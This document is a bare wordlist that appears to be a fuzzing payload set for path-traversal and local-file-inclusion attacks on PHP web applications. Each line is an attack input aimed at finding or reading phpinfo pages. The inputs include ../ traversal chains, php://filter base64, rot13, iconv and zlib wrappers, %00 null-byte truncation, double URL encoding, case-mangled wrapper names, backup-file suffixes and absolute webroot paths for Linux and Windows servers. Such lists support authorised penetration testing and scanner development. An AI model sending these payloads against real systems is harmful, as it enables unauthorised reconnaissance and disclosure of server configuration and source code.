phpinfo.php
info.php
test.php
i.php
php.php
pi.php
p.php
asdf.php
index.php
default.php
main.php
home.php
about.php
debug.php
probe.php
check.php
diagnostic.php
server.php
status.php
version.php
ver.php
../phpinfo.php
../info.php
../test.php
../i.php
../../phpinfo.php
../../info.php
../../test.php
../../i.php
../../../phpinfo.php
../../../info.php
../../../test.php
../../../i.php
../../../../phpinfo.php
../../../../info.php
../../../../test.php
../../../../i.php
../../../../../phpinfo.php
../../../../../info.php
../../../../../test.php
../../../../../i.php
../../../../../../phpinfo.php
../../../../../../info.php
../../../../../../test.php
../../../../../../i.php
/phpinfo.php
/info.php
/test.php
/i.php
/php.php
/test/phpinfo.php
/test/info.php
/test/test.php
/test/i.php
../test/phpinfo.php
../test/info.php
../../test/phpinfo.php
../../test/info.php
../../../test/phpinfo.php
../../../test/info.php
/tests/phpinfo.php
/tests/info.php
/tests/test.php
../tests/phpinfo.php
../../tests/phpinfo.php
../../../tests/phpinfo.php
/testing/phpinfo.php
/testing/info.php
/testing/test.php
../testing/phpinfo.php
../../testing/phpinfo.php
/dev/phpinfo.php
/dev/info.php
/dev/test.php
../dev/phpinfo.php
../../dev/phpinfo.php
../../../dev/phpinfo.php
/development/phpinfo.php
/development/info.php
../development/phpinfo.php
../../development/phpinfo.php
/demo/phpinfo.php
/demo/info.php
/demo/test.php
../demo/phpinfo.php
../../demo/phpinfo.php
/tmp/phpinfo.php
/tmp/info.php
/tmp/test.php
../tmp/phpinfo.php
../../tmp/phpinfo.php
../../../tmp/phpinfo.php
/temp/phpinfo.php
/temp/info.php
../temp/phpinfo.php
../../temp/phpinfo.php
/backup/phpinfo.php
/backup/info.php
../backup/phpinfo.php
../../backup/phpinfo.php
/admin/phpinfo.php
/admin/info.php
/admin/test.php
../admin/phpinfo.php
../../admin/phpinfo.php
/administrator/phpinfo.php
/administrator/info.php
../administrator/phpinfo.php
../../administrator/phpinfo.php
/debug/phpinfo.php
/debug/info.php
/debug/test.php
../debug/phpinfo.php
../../debug/phpinfo.php
/diagnostic/phpinfo.php
/diagnostic/info.php
../diagnostic/phpinfo.php
/diagnostics/phpinfo.php
/diagnostics/info.php
../diagnostics/phpinfo.php
/cgi-bin/phpinfo.php
/cgi-bin/info.php
../cgi-bin/phpinfo.php
../../cgi-bin/phpinfo.php
/public/phpinfo.php
/public/info.php
/public/test.php
../public/phpinfo.php
../../public/phpinfo.php
/www/phpinfo.php
/www/info.php
/www/test.php
../www/phpinfo.php
../../www/phpinfo.php
/html/phpinfo.php
/html/info.php
../html/phpinfo.php
../../html/phpinfo.php
/htdocs/phpinfo.php
/htdocs/info.php
../htdocs/phpinfo.php
../../htdocs/phpinfo.php
/public_html/phpinfo.php
/public_html/info.php
../public_html/phpinfo.php
../../public_html/phpinfo.php
/var/www/html/phpinfo.php
/var/www/html/info.php
/var/www/html/test.php
../var/www/html/phpinfo.php
../../var/www/html/phpinfo.php
../../../var/www/html/phpinfo.php
../../../../var/www/html/phpinfo.php
php://filter/convert.base64-encode/resource=phpinfo.php
php://filter/convert.base64-encode/resource=info.php
php://filter/convert.base64-encode/resource=test.php
php://filter/convert.base64-encode/resource=i.php
php://filter/convert.base64-encode/resource=../phpinfo.php
php://filter/convert.base64-encode/resource=../../phpinfo.php
php://filter/convert.base64-encode/resource=../../../phpinfo.php
php://filter/convert.base64-encode/resource=../../../../phpinfo.php
php://filter/convert.base64-encode/resource=/test/phpinfo.php
php://filter/convert.base64-encode/resource=../test/phpinfo.php
php://filter/convert.base64-encode/resource=/tests/phpinfo.php
php://filter/convert.base64-encode/resource=/dev/phpinfo.php
php://filter/convert.base64-encode/resource=/admin/phpinfo.php
php://filter/string.rot13/resource=phpinfo.php
php://filter/string.rot13/resource=info.php
php://filter/string.rot13/resource=../phpinfo.php
php://filter/string.rot13/resource=../../phpinfo.php
php://filter/string.rot13/resource=/test/phpinfo.php
phpinfo.php%00
info.php%00
test.php%00
i.php%00
../phpinfo.php%00
../info.php%00
../../phpinfo.php%00
../../info.php%00
../../../phpinfo.php%00
%2e%2e/phpinfo.php
%2e%2e/info.php
%2e%2e/%2e%2e/phpinfo.php
%2e%2e/%2e%2e/info.php
%2e%2e/%2e%2e/%2e%2e/phpinfo.php
%252e%252e/phpinfo.php
%252e%252e/info.php
%252e%252e/%252e%252e/phpinfo.php
file:///phpinfo.php
file:///info.php
file:///test.php
file://../phpinfo.php
file://../info.php
file://../../phpinfo.php
file://../../info.php
..//phpinfo.php
..//info.php
..//..//phpinfo.php
..//..//info.php
....//phpinfo.php
....//info.php
....//....//phpinfo.php
/phpinfo.php.bak
/info.php.bak
/test.php.bak
../phpinfo.php.bak
../../phpinfo.php.bak
/phpinfo.php.old
/info.php.old
../phpinfo.php.old
/phpinfo.php.backup
../phpinfo.php.backup
/phpinfo.php.txt
/info.php.txt
../phpinfo.php.txt
/phpinfo.php~
/info.php~
../phpinfo.php~
pHp://filter/convert.base64-encode/resource=phpinfo.php
pHp://filter/convert.base64-encode/resource=info.php
PHP://filter/convert.base64-encode/resource=phpinfo.php
%70%68%70://filter/convert.base64-encode/resource=phpinfo.php
%70%68%70://filter/convert.base64-encode/resource=info.php
php://filter/read=convert.base64-encode/resource=phpinfo.php
php://filter/read=convert.base64-encode/resource=info.php
php://filter/read=convert.base64-encode/resource=../phpinfo.php
php://filter/read=convert.base64-encode/resource=/test/phpinfo.php
php://filter/convert.iconv.utf-8.utf-16/resource=phpinfo.php
php://filter/convert.iconv.utf-8.utf-16/resource=info.php
php://filter/zlib.deflate/resource=phpinfo.php
php://filter/zlib.deflate/resource=info.php
/docs/phpinfo.php
/docs/info.php
../docs/phpinfo.php
../../docs/phpinfo.php
/documentation/phpinfo.php
/documentation/info.php
../documentation/phpinfo.php
/examples/phpinfo.php
/examples/info.php
../examples/phpinfo.php
../../examples/phpinfo.php
/example/phpinfo.php
/example/info.php
../example/phpinfo.php
/manual/phpinfo.php
../manual/phpinfo.php
/inc/phpinfo.php
/inc/info.php
../inc/phpinfo.php
../../inc/phpinfo.php
/includes/phpinfo.php
/includes/info.php
../includes/phpinfo.php
../../includes/phpinfo.php
/include/phpinfo.php
/include/info.php
../include/phpinfo.php
/lib/phpinfo.php
/lib/info.php
../lib/phpinfo.php
../../lib/phpinfo.php
/libraries/phpinfo.php
/libraries/info.php
../libraries/phpinfo.php
/library/phpinfo.php
../library/phpinfo.php
/scripts/phpinfo.php
/scripts/info.php
../scripts/phpinfo.php
../../scripts/phpinfo.php
/script/phpinfo.php
../script/phpinfo.php
/src/phpinfo.php
/src/info.php
../src/phpinfo.php
../../src/phpinfo.php
/source/phpinfo.php
../source/phpinfo.php
/assets/phpinfo.php
/assets/info.php
../assets/phpinfo.php
/uploads/phpinfo.php
/uploads/info.php
../uploads/phpinfo.php
../../uploads/phpinfo.php
/upload/phpinfo.php
../upload/phpinfo.php
/files/phpinfo.php
/files/info.php
../files/phpinfo.php
/images/phpinfo.php
../images/phpinfo.php
/img/phpinfo.php
../img/phpinfo.php
/css/phpinfo.php
../css/phpinfo.php
/js/phpinfo.php
../js/phpinfo.php
/api/phpinfo.php
/api/info.php
../api/phpinfo.php
../../api/phpinfo.php
/v1/phpinfo.php
../v1/phpinfo.php
/v2/phpinfo.php
../v2/phpinfo.php
/app/phpinfo.php
/app/info.php
../app/phpinfo.php
../../app/phpinfo.php
/application/phpinfo.php
../application/phpinfo.php
/static/phpinfo.php
/static/info.php
../static/phpinfo.php
/config/phpinfo.php
/config/info.php
../config/phpinfo.php
../../config/phpinfo.php
/conf/phpinfo.php
../conf/phpinfo.php
/setup/phpinfo.php
/setup/info.php
../setup/phpinfo.php
/install/phpinfo.php
/install/info.php
../install/phpinfo.php
../../install/phpinfo.php
/installation/phpinfo.php
../installation/phpinfo.php
phpinfo.php.
info.php.
phpinfo.php....
../phpinfo.php.
phpinfo.php/
info.php/
../phpinfo.php/
phpinfo.php#
info.php#
../phpinfo.php#
phpinfo.php?
info.php?
../phpinfo.php?
./phpinfo.php
./info.php
././phpinfo.php
././info.php
./../phpinfo.php
./../info.php
./../../phpinfo.php
phpinfo
info
test
php
pi
../phpinfo
../../phpinfo
../../../phpinfo
/phpinfo
/test/phpinfo
/tests/phpinfo
php://filter/string.rot13|string.rot13/resource=phpinfo.php
php://filter/string.rot13|string.rot13/resource=info.php
php://filter/convert.base64-encode|convert.base64-decode/resource=phpinfo.php
php://filter/convert.base64-encode|convert.base64-decode/resource=info.php
/var/www/phpinfo.php
/var/www/info.php
../var/www/phpinfo.php
../../var/www/phpinfo.php
../../../var/www/phpinfo.php
/usr/share/nginx/html/phpinfo.php
/usr/share/nginx/html/info.php
../usr/share/nginx/html/phpinfo.php
../../usr/share/nginx/html/phpinfo.php
/usr/local/apache2/htdocs/phpinfo.php
../usr/local/apache2/htdocs/phpinfo.php
../../usr/local/apache2/htdocs/phpinfo.php
/opt/lampp/htdocs/phpinfo.php
../opt/lampp/htdocs/phpinfo.php
../../opt/lampp/htdocs/phpinfo.php
C:\xampp\htdocs\phpinfo.php
C:\wamp\www\phpinfo.php
C:\inetpub\wwwroot\phpinfo.php
